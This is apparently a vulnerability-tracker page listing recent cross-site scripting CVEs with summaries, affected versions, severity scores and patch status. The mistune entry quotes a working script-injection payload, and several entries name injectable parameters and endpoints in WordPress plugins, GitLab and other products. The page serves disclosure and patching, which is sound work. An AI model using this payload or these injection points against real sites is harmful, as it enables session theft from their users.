Skip to main content

XSS

38829 CVEs technique

Monthly

CVE-2026-44898 PyPI MEDIUM PATCH GHSA This Month

Cross-site scripting (XSS) vulnerability in mistune's render_toc_ul() function allows attackers to inject arbitrary HTML and JavaScript into table-of-contents output by crafting malicious heading IDs. When heading identifiers are derived from user-supplied text (standard practice for readable slug anchors), an attacker can break out of the href attribute context with a payload like `x"><script>alert(document.cookie)</script><a href="`, causing the script block to execute in the rendered TOC. The vulnerability requires user interaction (UI:R) to view the poisoned TOC but affects all users of the generated page. Vendor-released patch available in mistune 3.2.1.

XSS Apple Python Red Hat
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-42159 MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Flowsint prior to version 1.2.3 allows remote attackers to inject arbitrary HTML into node descriptions within sketches, which is executed when the node is selected by a user. This requires user interaction to view the malicious node but can compromise investigation integrity and potentially lead to credential theft or malware delivery within the OSINT analysis workflow.

XSS Flowsint
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2025-62316 LOW Monitor

HCL AION fails to configure security-related HTTP response headers, potentially reducing browser-based protections against cross-site scripting and other client-side attacks. The vulnerability requires adjacent network access, high interaction complexity, low privilege authentication, and user interaction to achieve limited confidentiality impact. CVSS score of 2.3 reflects minimal real-world risk under current attack conditions.

XSS Aion
NVD
CVSS 3.1
2.3
EPSS
0.0%
CVE-2026-44371 MEDIUM PATCH This Month

Cross-site scripting (XSS) in Open OnDemand prior to versions 4.0.11, 4.1.5, and 4.2.2 allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via specially crafted filenames displayed in the file browser interface. The vulnerability requires user interaction (clicking or viewing the malicious filename) and results in limited scope impact affecting only the confidentiality and integrity of the user's session. No public exploit code has been identified at time of analysis.

XSS
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-42457 CRITICAL PATCH Act Now

Stored Cross-Site Scripting (XSS) in vCluster Platform allows authenticated attackers with namespace creation privileges to inject malicious scripts via the templateRef name field, potentially escalating to Global-Admin access. The vulnerability affects versions prior to 4.4.3, 4.5.5, 4.6.2, 4.7.1, and 4.8.0. With a CVSS score of 9.0 and changed scope (S:C), this represents a critical privilege escalation path in Kubernetes multi-tenancy environments. No active exploitation confirmed by CISA KEV at time of analysis, but the low attack complexity (AC:L) and clear attack path make this an immediate patching priority for organizations running vCluster Platform.

Kubernetes XSS
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2026-41932 MEDIUM PATCH This Month

Stored cross-site scripting in Vvveb before 1.0.8.3 allows unauthenticated attackers to inject arbitrary HTML and JavaScript via the username field during customer signup, which persists in the display_name column and executes when rendered without encoding in vulnerable views. The vulnerability requires user interaction (visiting a page displaying the attacker's injected display_name) and affects confidentiality and integrity with CVSS 5.3. No public exploit code or active exploitation has been reported at time of analysis.

XSS
NVD GitHub
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-21730 MEDIUM PATCH This Month

Verba is affected by a Stored Cross-Site Scripting (XSS) vulnerability within its login logging mechanism. When an unauthenticated remote attacker attempts to log in using an incorrect username and password combination, the supplied username value is recorded in the application logs. Due to lack of input sanitization, an attacker can inject a malicious XSS payload into the username field. This payload will be executed in the context of the administrator’s browser when the admin accesses the web application's log viewer. The vendor was notified early about this vulnerability, but didn't respond to our messages. This issue was fixed in version 10.0.6

XSS Verba
NVD VulDB
CVSS 4.0
5.3
EPSS
0.2%
CVE-2026-1630 MEDIUM PATCH This Month

Reflected XSS in WEBCON BPS via the '/openinmobileapp' endpoint allows unauthenticated attackers to inject arbitrary JavaScript that executes in authenticated users' browsers when a crafted URL is opened. The vulnerability requires user interaction (clicking a link) but impacts session confidentiality and integrity. Vendor-released patches are available for versions 2026.1.3.109 and 2025.2.1.293.

XSS Webcon Bps
NVD
CVSS 4.0
5.1
EPSS
0.1%
CVE-2026-43644 Go MEDIUM POC PATCH This Month

Reflected cross-site scripting in podinfo through 6.11.2 allows remote unauthenticated attackers to execute arbitrary JavaScript in the context of a victim's browser session by crafting HTML pages with auto-submitting forms that deliver script payloads to the /echo or /api/echo endpoints. The vulnerability exists because the echoHandler writes request body content directly to the response without setting explicit Content-Type or X-Content-Type-Options headers, causing Go's content type detection to default to text/html. Publicly available exploit code confirms the vulnerability is exploitable, though CISA KEV status is not confirmed at the time of analysis.

XSS Podinfo
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-5790 MEDIUM This Month

Stored cross-site scripting (XSS) in Stel Order v3.25.1 and earlier allows unauthenticated remote attackers to inject persistent malicious JavaScript via the 'legalName' and 'employeeID' parameters at the '/app/FrontController' endpoint. When administrators or other users access affected sections, injected code executes in their browsers with user interaction, enabling session hijacking and account takeover. SSVC framework rates this as automatable but only partial technical impact with no confirmed active exploitation.

XSS Stel Order
NVD
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-6504 MEDIUM This Month

Stored Cross-Site Scripting in Royal Elementor Addons and Templates plugin for WordPress up to version 1.7.1058 allows authenticated attackers with Contributor-level privileges to inject arbitrary JavaScript via the 'title_tag' parameter in multiple widgets, with execution occurring when any user accesses the affected page. The vulnerability stems from insufficient input sanitization and output escaping on user-controlled parameters.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6174 MEDIUM This Month

Stored cross-site scripting in CC Child Pages WordPress plugin up to version 2.1.1 allows authenticated attackers with Contributor-level access and above to inject arbitrary JavaScript via the 'more' parameter, which executes in the browsers of users viewing the compromised pages. CVSS 6.4 reflects the authentication gate but cross-site scope (C:L/I:L/S:C). No public exploit code or active exploitation confirmed at time of analysis.

XSS WordPress
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6252 MEDIUM This Month

Stored Cross-Site Scripting in the Meta Field Block WordPress plugin (versions ≤1.5.2) allows authenticated contributors to inject persistent malicious scripts via the unsanitized 'tagName' block attribute. Any user who subsequently visits a page containing the injected block will execute the attacker's arbitrary JavaScript in their browser context. A vendor-released patch (1.5.3) is available; no public exploit has been identified and EPSS and SSVC signals both indicate low exploitation probability at this time.

XSS WordPress Meta Field Block Display Custom Fields In The Block Editor Without Coding
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-3718 HIGH This Week

Stored cross-site scripting in the ManageWP Worker WordPress plugin (versions ≤ 4.9.31) allows unauthenticated remote attackers to inject arbitrary JavaScript via a crafted 'MWP-Key-Name' HTTP request header, which executes when an administrator later visits the plugin's connection management page with debug parameters. No public exploit identified at time of analysis, and the EPSS score is very low (0.07%, 22nd percentile), but the unauthenticated network attack vector and changed scope (S:C) keep this relevant for any site using the plugin.

XSS WordPress Managewp Worker
NVD
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-3694 MEDIUM This Month

Stored Cross-Site Scripting in the Bold Page Builder WordPress plugin (versions up to and including 5.6.8) allows authenticated attackers holding contributor-level access or higher to inject persistent malicious JavaScript via the 'text' attribute of the bt_bb_button shortcode. The script executes in the browser of any user who subsequently loads the compromised page, including administrators, enabling session hijacking or unauthorized action execution under victim identity. No active exploitation is confirmed - the vulnerability is absent from CISA KEV, carries an EPSS score of 0.03% (8th percentile), and SSVC designates exploitation status as none.

XSS WordPress Bold Page Builder
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-7481 HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition lets an authenticated user holding Developer-role permissions inject arbitrary JavaScript that executes in the browsers of other users who view the affected content. The flaw stems from improper input sanitization and affects all 16.4-series through 18.11.x releases prior to the 18.9.7, 18.10.6, and 18.11.3 patch releases. No public exploit identified at time of analysis, and EPSS is very low (0.02%), but CVSS is rated 8.7 because the scope-changing XSS can hijack higher-privileged user sessions.

XSS Gitlab
NVD VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-7377 HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition's customizable analytics dashboards allows an authenticated user to execute arbitrary JavaScript in the browsers of other users who view the affected dashboard. The flaw affects EE 18.7-18.9.6, 18.10-18.10.5, and 18.11-18.11.2, carries a CVSS 8.7 (scope-changed) rating, and a vendor patch is available. No public exploit identified at time of analysis and EPSS is very low (0.02%, 5th percentile).

XSS Gitlab
NVD VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-6417 MEDIUM This Month

Reflected Cross-Site Scripting in the GLS Shipping for WooCommerce WordPress plugin (all versions through 1.4.0) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'failed_orders' parameter, executing in victims' browsers when they interact with a crafted link. The CVSS vector (PR:N, S:C) confirms no authentication is needed by the attacker, though user interaction is required, and the Changed scope rating means successful exploitation can affect resources beyond the plugin's own context - such as session tokens or other page content. No active exploitation is identified at time of analysis; EPSS stands at 0.06% (17th percentile) and CISA SSVC assigns exploitation status of 'none', making this a theoretical rather than emergent threat.

XSS WordPress
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-6335 MEDIUM PATCH This Month

Cross-site scripting in GitLab CE/EE 18.11.x (before 18.11.3) enables an authenticated low-privilege attacker to inject unsanitized content that executes arbitrary JavaScript within another user's browser session. The CVSS Scope Changed (S:C) flag reflects the cross-user impact boundary: the vulnerability allows one GitLab principal to affect a distinct security context belonging to a different user, including potentially higher-privileged accounts such as project owners or instance administrators. No public exploit code exists and no active exploitation has been identified - EPSS at 0.02% (5th percentile) and SSVC exploitation status of 'none' both confirm low immediate urgency - though GitLab's wide enterprise deployment makes patching to 18.11.3 advisable.

XSS Gitlab RCE
NVD
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-6073 HIGH PATCH This Week

Stored cross-site scripting in GitLab Enterprise Edition 18.7-18.11.x allows an authenticated user to inject arbitrary JavaScript that executes in other users' browser sessions due to improper input sanitization. The CVSS 8.7 score is elevated by Scope:Changed (S:C), reflecting that injected script can pivot across security contexts and potentially target administrators. No public exploit identified at time of analysis, EPSS is very low (0.02%, 5th percentile), and SSVC indicates no observed exploitation, but a vendor patch is available across all three affected branches.

XSS Gitlab
NVD VulDB
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-5243 MEDIUM This Month

Stored cross-site scripting in The Plus Addons for Elementor WordPress plugin (all versions through 6.4.11) allows authenticated contributors to persistently inject arbitrary JavaScript via the `menu_hover_click` parameter of the Navigation Menu Lite widget. The CVSS scope change (S:C) confirms the payload executes in visiting users' browser contexts rather than the attacker's, enabling session hijacking, credential harvesting, or admin account takeover against any user who loads an affected page. EPSS is very low at 0.03% (8th percentile) and SSVC confirms no known exploitation, but the low privilege bar - contributor access, which is routinely granted on multi-author WordPress sites - elevates practical risk above what the medium CVSS score alone suggests.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-15345 MEDIUM This Month

Reflected Cross-Site Scripting in the MapGeo - Interactive Geo Maps WordPress plugin (all versions through 1.6.27) allows unauthenticated remote attackers to inject arbitrary JavaScript via the unsanitized 'map' parameter of the display-map shortcode. Exploitation requires tricking an authenticated or anonymous site visitor into clicking a crafted URL, after which the injected script executes in the victim's browser within the plugin's page scope. No public exploit code or CISA KEV listing exists at time of analysis; EPSS probability is 0.06%, placing this in the 19th percentile of exploitation likelihood.

XSS WordPress
NVD
CVSS 3.1
6.1
EPSS
0.1%
CVE-2026-5361 MEDIUM This Month

Stored Cross-Site Scripting in Envira Gallery Lite (WordPress plugin, versions ≤ 1.12.4) enables authenticated attackers with Author-level access to inject persistent arbitrary JavaScript into gallery pages via the REST API. The attack exploits a context mismatch: the `arrows` gallery parameter is omitted from `sanitize_config_values()` sanitization, and `gallery_init()` escapes it with `esc_attr()` — a function designed for HTML attribute contexts, not inline JavaScript — allowing JavaScript expression injection that executes in any visitor's browser. No public exploit or active exploitation has been identified; EPSS is 0.01% and CISA KEV status is absent, placing this firmly in the low-immediate-risk tier despite its persistent, cross-user impact.

XSS WordPress Envira Gallery Image Photo Gallery Albums Video Gallery Slideshows More
NVD VulDB
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-24710 MEDIUM This Month

Cross-site scripting (XSS) vulnerability in Northern.tech CFEngine Enterprise before versions 3.21.8, 3.24.3, and 3.27.0 allows remote attackers to inject malicious scripts into web application responses. User interaction is required to trigger the vulnerability, limiting real-time automation of attacks but enabling account compromise, session hijacking, or credential theft against CFEngine administrators and users. No public exploit code or active exploitation has been identified at the time of analysis.

XSS
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-44369 HIGH PATCH This Week

Stored cross-site scripting in CVAT (Computer Vision Annotation Tool) versions 2.5.0 through 2.63.0 allows an authenticated user with annotation-guide create/edit privileges to inject malicious JavaScript into a task's annotation guide, which executes in any victim's browser that opens it. Executed script runs with the victim's CVAT session privileges, enabling arbitrary API requests on their behalf. No public exploit identified at time of analysis; EPSS is low (0.05%) and SSVC reports no observed exploitation.

XSS Cvat
NVD GitHub
CVSS 4.0
8.5
EPSS
0.0%
CVE-2026-44376 MEDIUM POC PATCH This Month

Reflected XSS in CubeCart v6 (prior to 6.7.0) enables unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by delivering a crafted search URL that triggers a specific single-result code path in the search feature. The flaw exists in classes/catalogue.class.php where the searchCatalogue() method reflects the raw $_REQUEST['search']['keywords'] parameter in a notification message without sanitization - but only when the search returns exactly one product, bypassing all other input filters. A working exploit is publicly available on Exploit-DB (52588), though no public exploit identified at time of analysis places this in CISA KEV, and EPSS remains low at 0.03%.

PHP XSS V6
NVD GitHub Exploit-DB VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-39428 MEDIUM PATCH This Month

Stored Cross-Site Scripting in CubeCart v6.x (prior to 6.6.0) allows an authenticated administrator to inject persistent malicious JavaScript into product creation or modification fields, which then executes in the browsers of any user - customer or fellow administrator - who views the affected product pages. The attack requires high-privilege access (PR:H) and victim interaction (UI:R), limiting its realistic threat surface to compromised or malicious admin accounts. No public exploit identified at time of analysis via KEV, though SSVC data indicates proof-of-concept code exists; EPSS stands at 0.03% (8th percentile), reflecting low observed exploitation pressure.

XSS V6
NVD GitHub VulDB
CVSS 3.1
4.8
EPSS
0.0%
CVE-2026-45228 MEDIUM PATCH This Month

Stored cross-site scripting in Quark Drive (quark-auto-save) before version 0.8.5 allows an authenticated low-privileged user to inject persistent JavaScript payloads that execute in the browsers of all authenticated users who view the System Configuration page. The root cause is Vue.js's v-html directive rendering push_config key names as raw HTML without sanitization, with payloads written to disk via the POST /update endpoint. No public exploit code has been identified at time of analysis, and the EPSS score of 0.03% (10th percentile) signals very low current exploitation probability, but the persistent, multi-victim nature of the stored XSS elevates real-world impact in multi-user deployments.

XSS Quark Auto Save
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-21821 HIGH This Week

Use of an end-of-life jQuery 1.x library in HCL BigFix SCM Reporting 11.0.5 exposes the management console to client-side attacks, including DOM-based XSS, inherited from publicly known unpatched flaws in the dependency. With no public exploit identified at time of analysis and a very low EPSS score (0.04%), the CVSS 8.3 rating reflects high theoretical impact rather than confirmed in-the-wild abuse, though successful exploitation requires user interaction with a crafted resource.

XSS Bigfix Scm Reporting
NVD VulDB
CVSS 3.1
8.3
EPSS
0.0%
CVE-2026-0256 MEDIUM PATCH This Month

Stored cross-site scripting in Palo Alto Networks PAN-OS® web interface allows a malicious authenticated administrator to inject persistent JavaScript payloads that execute in the browsers of other users who view the affected pages. Affected deployments include PA-Series and VM-Series firewalls and Panorama (virtual and M-Series) running PAN-OS 10.2.x, 11.1.x, 11.2.x, and 12.1.x branches. No active exploitation is confirmed - EPSS stands at 0.04% (13th percentile), SSVC exploitation status is 'none', and no public exploit code has been identified at time of analysis. Vendor-released patches are available for all affected branches.

Paloalto XSS Cloud Ngfw Pan Os Prisma Access
NVD VulDB
CVSS 4.0
4.4
EPSS
0.0%
CVE-2026-8496 MEDIUM PATCH This Month

Stored XSS in Alinto SOGo's ICS calendar invitation viewer enables a remote unauthenticated attacker to execute arbitrary JavaScript within an authenticated victim's SOGo webmail session. Affected versions span all releases prior to 5.12.8; the root cause is an incomplete blocklist sanitizer in NSString+Utilities.m that explicitly blocked only 'onload' and 'onmouseover' event handlers, leaving the SVG animation event 'onrepeat' unfiltered when SVG content appears in an ICS DESCRIPTION field. No public exploit has been identified at time of analysis and CISA SSVC confirms no active exploitation, but the CVSS Scope:Changed rating reflects that successful execution grants the attacker full access to the victim's authenticated session context, enabling mailbox access, contact theft, and session hijacking.

XSS Sogo
NVD GitHub VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-45375 Go CRITICAL GHSA Act Now

Stored cross-site scripting in SiYuan's Bazaar marketplace (versions ≤ 3.6.5) escalates to arbitrary OS command execution on the Electron desktop client because the kernel sanitizer in kernel/bazaar/package.go HTML-escapes only Author, DisplayName, and Description while passing Name and Version straight to innerHTML sinks. Any attacker who can publish a plugin/theme/template/widget/icon manifest to the public Bazaar - or otherwise drop a malicious plugin.json into the workspace - triggers zero-click code execution the moment a victim opens Settings → Marketplace → Downloaded → Plugins. A detailed POC against b3log/siyuan:v3.6.5 is published in the GHSA advisory; publicly available exploit code exists, though EPSS remains low at 0.04%.

XSS Command Injection Canonical Docker Node.js
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.0%
CVE-2020-37225 MEDIUM POC This Month

Powie's WHOIS Domain Check 0.9.31 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject arbitrary JavaScript by exploiting unsanitized input fields in. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD Exploit-DB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2020-37222 MEDIUM POC This Month

Kuicms Php EE 2.0 contains a persistent cross-site scripting vulnerability that allows unauthenticated attackers to inject malicious scripts by submitting crafted content through the bbs reply. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS
NVD Exploit-DB
CVSS 4.0
5.1
EPSS
0.1%
CVE-2020-37174 MEDIUM POC This Month

WOOF Products Filter for WooCommerce 1.2.3 contains a persistent cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts by entering XSS payloads in design. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS WordPress
NVD Exploit-DB
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-6177 HIGH This Week

Stored cross-site scripting in Custom Twitter Feeds plugin for WordPress versions ≤2.5.4 allows unauthenticated remote attackers to execute arbitrary JavaScript when malicious content enters cached tweet data. The vulnerability stems from the ctf_get_more_posts AJAX endpoint outputting cached tweet text through nl2br() without HTML escaping, accessible without authentication (CVSS:3.1/AV:N/AC:L/PR:N/UI:N). Attack requires either posting malicious tweets that the target site caches via its feed configuration, or leveraging other vulnerabilities to poison the tweet cache. No active exploitation confirmed at time of analysis. Wordfence identified the flaw with patch available in changeset 3519584.

XSS WordPress
NVD
CVSS 3.1
7.2
EPSS
0.2%
CVE-2026-42948 MEDIUM This Month

Stored cross-site scripting vulnerability in ELECOM wireless LAN access point devices (WAB-BE187-M, WAB-BE72-M, WAB-BE36-M, WAB-BE36-S) allows authenticated administrators to inject malicious scripts that execute in other administrators' web browsers when they access the device management interface. Exploitation requires high-privilege administrative credentials and user interaction (victim must visit the admin panel), limiting real-world risk despite network-accessible attack surface.

XSS Wab Be187 M Wab Be72 M Wab Be36 M Wab Be36 S
NVD
CVSS 4.0
4.8
EPSS
0.0%
CVE-2026-3004 MEDIUM This Month

Stored Cross-Site Scripting in Snow Monkey Blocks WordPress plugin up to version 24.1.11 allows authenticated attackers with Contributor-level or higher privileges to inject arbitrary JavaScript via the 'data-slick' attribute, which executes in the browsers of all users who view the affected pages. The vulnerability stems from insufficient input sanitization and output escaping in block rendering functionality. CVSS 6.4 reflects the moderate severity; exploitation requires prior authentication and contributor access, limiting the attack surface to trusted WordPress users or accounts obtained through compromise.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2025-14767 MEDIUM This Month

Stored Cross-Site Scripting in WPC Badge Management for WooCommerce plugin versions up to 3.1.6 allows authenticated attackers with Shop Manager-level access to inject arbitrary JavaScript via the 'text' attribute of the wpcbm_best_seller shortcode. The injected scripts execute in the browsers of any user visiting the affected page, enabling credential theft, session hijacking, or defacement. The vulnerability stems from insufficient input sanitization and output escaping in shortcode processing.

XSS WordPress
NVD
CVSS 3.1
5.5
EPSS
0.0%
CVE-2025-9989 MEDIUM This Month

Stored Cross-Site Scripting in Broadstreet plugin for WordPress versions up to 1.53.1 allows authenticated administrators to inject arbitrary JavaScript into admin settings that executes for all users viewing affected pages. The vulnerability requires administrator-level access, high attack complexity due to disabled unfiltered_html or multi-site configuration restrictions, and impacts confidentiality and integrity with limited scope. No active exploitation confirmed at time of analysis.

XSS WordPress
NVD
CVSS 3.1
4.4
EPSS
0.0%
CVE-2026-6828 MEDIUM This Month

Stored Cross-Site Scripting (XSS) in Fluent Forms WordPress plugin versions up to 6.2.1 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'permission_message' parameter, which executes when any user views the affected page. The vulnerability stems from insufficient input sanitization and output escaping in the Component module. No active exploitation or public proof-of-concept has been reported, but the low attack complexity and network accessibility make this a practical risk for WordPress sites with contributor-level user accounts.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-6962 MEDIUM This Month

Stored cross-site scripting in Cost of Goods: Product Cost & Profit Calculator for WooCommerce plugin (all versions up to 4.1.0) allows authenticated attackers with contributor-level access to inject arbitrary JavaScript via unsanitized shortcode attributes 'alg_wc_cog_product_cost' and 'alg_wc_cog_product_profit', which executes in the browsers of all users viewing the affected pages. The vulnerability requires prior account access but no user interaction for execution, making it a persistent attack vector for privilege escalation or malicious content injection on WordPress sites.

XSS WordPress
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-45028 npm LOW PATCH GHSA Monitor

Astro versions prior to 6.1.10 fail to bind encrypted server island parameters to their intended component and purpose, allowing attackers to replay encrypted props as slots or vice versa. This cryptographic binding failure could lead to cross-site scripting (XSS) when applications use server islands with overlapping prop and slot names where an attacker controls prop values. The vulnerability requires very specific application architecture (shared key names, dynamically rendered pages, attacker-controlled props) making real-world exploitation unlikely, but the underlying encryption design flaw is significant.

XSS
NVD GitHub
CVSS 4.0
2.9
EPSS
0.0%
CVE-2025-27852 MEDIUM This Month

Reflected cross-site scripting (XSS) in Garmin WDU v1 1.4.6 and v2 5.0 allows local network attackers to execute arbitrary JavaScript with full administrator-level access to the device. Exploitation requires the victim to visit a malicious URL and click an element on the rendered page, making this a moderate-risk vulnerability primarily affecting users on trusted networks who may be socially engineered.

XSS
NVD VulDB
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-42157 MEDIUM This Month

Flowsint is an open-source OSINT graph exploration tool designed for cybersecurity investigation, transparency, and verification. Prior to 1.2.3, a remote attacker can create a map node with a malicious label that contains arbitrary HTML. When the map tab is selected and a map node marker is selected, it will render the arbitrary HTML, potentially triggering stored XSS. This vulnerability is fixed in 1.2.3.

XSS
NVD GitHub
CVSS 4.0
5.1
EPSS
0.2%
CVE-2026-44651 npm MEDIUM PATCH GHSA This Month

## Resolution Fixed in SillyTavern 1.18.0: a user-provided URL is no longer reflected in the HTTP response body. ## Overview - Vulnerability Type: XSS - Affected Location: `src/middleware/corsProxy.js:40` - Trigger Scenario: reflected XSS in CORS proxy error response ## Root Cause When `fetch(url)` throws, the code sends: `res.status(500).send('Error occurred while trying to proxy to: ' + url + ' ' + error)`. The `url` value is attacker-controlled (`req.params.url`) and is not HTML-escaped before rendering. ## Source-to-Sink Chain 1. Source (user-controlled input) - Entry point: `GET /proxy/:url(*)` 2. Data flow - Code analysis shows concrete propagation into this sink: - vulnerability title: `Reflected XSS in CORS proxy error response` - sink location reached by attacker-controlled input: `src/middleware/corsProxy.js:40` - The same sink behavior is confirmed by controlled execution observations. 3. Sink (dangerous operation) - Sink location: `src/middleware/corsProxy.js:40` - Vulnerable behavior: reflected XSS in CORS proxy error response ## Exploitation Preconditions 1. The attacker can inject controllable content into a rendered response. 2. The vulnerable rendering context does not apply strict output encoding/sanitization. 3. A victim user opens the affected page or response. ## Risk This issue enables script execution in the victim context and can compromise session or data integrity. ## Impact An attacker may run arbitrary JavaScript in the victim context, steal tokens, and manipulate user-visible behavior. ## Remediation 1. Never concatenate raw user input into HTML error responses. 2. If URL echo is required, HTML-escape it or force plain-text output. 3. Re-enable/strengthen CSP to reduce reflected injection impact.

XSS
NVD GitHub
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-44648 npm HIGH PATCH GHSA This Week

### Summary Changing a user’s password does not invalidate existing sessions, allowing an attacker with a stolen cookie to retain access even after the victim resets their password. ### Details SillyTavern relies on cookie-session for authentication, storing all session data (user handle, permissions) in a signed cookie. The endpoints POST /api/users/change-password and POST /api/users/recover-step2 only update the password hash in the database but do not expire current sessions. Because the session is stateless and stored entirely in the client cookie, there is no server-side mechanism to revoke a token once issued. ### PoC 1.Log into the same SillyTavern account from two different browsers (e.g., Chrome and Firefox private mode). 2.In Chrome, change the account password under User Settings → Change Password. 3.In Firefox, refresh the page or perform a protected action (e.g., view API keys). 4.Expected: Firefox session should be invalidated and ask for login. 5.Actual: Firefox remains fully authenticated, able to perform all actions as the targeted user. ### Impact An attacker who obtains a valid session cookie (via XSS, MITM, physical access, etc.) can continue using it indefinitely, even after the legitimate user changes their password. This nullifies the most common recovery measure against session theft. The default cookie lifespan is 400 days, giving an attacker a very long exploitation window. ### Resolution A fix was released in the version 1.18.0, invalidating a session cookie on account password change.

Mozilla Google XSS Chrome
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-44259 MEDIUM PATCH This Month

efw4.X is an Enterprise Framework for Web. Prior to 4.08.010, the previewServlet serves files with their detected MIME type based on file extension, without any content sanitization or security headers. Files with .html, .htm, or .svg extensions are served as text/html or image/svg+xml respectively, causing any embedded JavaScript to execute in the victim's browser within the application's origin. This vulnerability is fixed in 4.08.010.

XSS Efw4 X
NVD GitHub
CVSS 3.1
4.6
EPSS
0.0%
CVE-2026-34658 MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

XSS Adobe
NVD
CVSS 3.1
4.8
EPSS
0.0%
CVE-2026-34686 HIGH This Week

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field, potentially gaining elevated access or control over the victim's account or session. Scope is changed.

XSS Adobe
NVD
CVSS 3.1
8.7
EPSS
0.0%
CVE-2026-34655 MEDIUM This Month

Adobe Commerce versions 2.4.9-beta1, 2.4.8-p4, 2.4.7-p9, 2.4.6-p14, 2.4.5-p16, 2.4.4-p17 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a high-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.

XSS Adobe
NVD
CVSS 3.1
4.8
EPSS
0.1%
CVE-2026-23819 HIGH This Week

A vulnerability in the web-based management interface of Access Points running AOS-10 and AOS-8 Instant could allow an unauthenticated remote attacker to execute arbitrary JavaScript code in a victim's browser within the same local network. Successful exploitation could allow an attacker to compromise user data and potentially manipulate device configuration settings.

XSS Arubaos Aos
NVD
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-43892 HIGH PATCH This Week

AntSword is a cross-platform website management toolkit. Prior to 2.1.16, incomplete noxss() sanitization leads to 1-click RCE via jquery.terminal format code injection. This vulnerability is fixed in 2.1.16.

XSS
NVD GitHub
CVSS 3.1
8.8
EPSS
0.0%
CVE-2026-41611 HIGH PATCH Exploit Unlikely This Week

Improper neutralization of script-related html tags in a web page (basic xss) in Visual Studio Code allows an unauthorized attacker to execute code locally.

XSS Visual Studio Code
NVD VulDB
CVSS 3.1
7.8
EPSS
0.1%
CVE-2026-41610 MEDIUM PATCH Exploit Unlikely This Month

Improper neutralization of input during web page generation ('cross-site scripting') in Visual Studio Code allows an unauthorized attacker to bypass a security feature locally.

XSS Visual Studio Code
NVD VulDB
CVSS 3.1
6.3
EPSS
0.0%
CVE-2026-45090 Go HIGH PATCH GHSA This Week

Complete process crash in Dalfox REST server v2.12.0 and earlier allows remote unauthenticated attackers to terminate the entire scan engine via a single HTTP request. The flaw stems from a closed-channel write panic in pkg/scanning/parameterAnalysis.go where two sequential worker stages share a single results channel, causing a Go runtime panic when the second stage attempts to write to the already-closed channel. Default deployments run without authentication (no --api-key), making the vulnerability remotely exploitable. CVSS 7.5 (High). Patched in v2.13.0 per GitHub advisory GHSA-2g4x-fq3j-cgq4. No CISA KEV listing or public exploit code identified at time of analysis.

XSS Docker Race Condition
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-45088 Go HIGH PATCH GHSA This Week

